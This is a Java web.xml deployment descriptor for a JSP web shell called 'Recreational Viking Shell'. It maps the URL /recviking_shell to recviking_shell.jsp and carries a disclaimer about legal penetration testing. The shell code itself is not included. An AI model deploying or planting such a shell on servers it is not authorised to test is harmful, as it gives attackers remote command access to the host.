<?xml version="1.0" encoding="utf-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
    version="2.4">

    <display-name>Recreational Viking Shell</display-name>
    <description>
	This is a basic shell for legal pentesting purposes where pentesting and 
    associated tools are legal. Recreational Viking claims no responsibility. 
    Recreational Viking is not liable for any misuse of this tool. 
    Recreational Viking is not liable for any damages caused by the 
    appropriate, inappropriate, or malfunctional use of this tool.
    </description>

    <servlet>
        <servlet-name>RecVikingShell</servlet-name>
        <jsp-file>/recviking_shell.jsp</jsp-file>
    </servlet>

    <servlet-mapping>
        <servlet-name>RecVikingShell</servlet-name>
        <url-pattern>/recviking_shell</url-pattern>
    </servlet-mapping>

</web-app>
